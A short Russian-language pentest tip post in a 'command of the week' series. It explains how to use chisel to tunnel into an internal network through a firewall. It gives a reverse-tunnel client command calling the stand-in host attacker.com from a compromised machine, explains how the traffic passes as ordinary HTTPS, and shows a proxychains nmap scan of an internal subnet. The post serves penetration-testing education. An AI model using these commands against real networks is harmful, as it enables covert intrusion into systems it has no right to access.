⌨️ Команда недели — 20 мая 2026 г. в 07:00:10.831
⌨️ Команда недели Привет! Расскажу про команду chisel, делаем с ней проброс портов через HTTP/HTTPS. Используют когда нужно попасть во внутреннюю сеть через файрвол который режет всё кроме веб-трафика. На сервере атакующего: chisel server -p 443 --reverse --socks5 На скомпрометированной машине: chisel client https://attacker.com R:socks Теперь через SOCKS5 прокси на локальном порту 1080 весь трафик идёт внутрь сети жертвы. Можно открывать браузер, запускать nmap, sqlmap - всё через туннель. 👨💻 Что здесь происходит: server -p 443 — слушаем на 443, выглядит как обычный HTTPS --reverse — клиент инициирует соединение, не сервер, обходит большинство файрволов --socks5 — поднимаем SOCKS5 прокси а не просто пробрасываем один порт R:socks — реверс-туннель, клиент пробрасывает SOCKS обратно на сервер атакующего https:// — трафик идёт поверх TLS, в логах выглядит как обычный веб-трафик P.S. Чтобы направить трафик конкретного инструмента через туннель добавь proxychains перед командой. proxychains nmap -sT -Pn 10.10.10.0/24 - скан внутренней сети через chisel. #команда #chisel #pentest 👍 Белый хакер

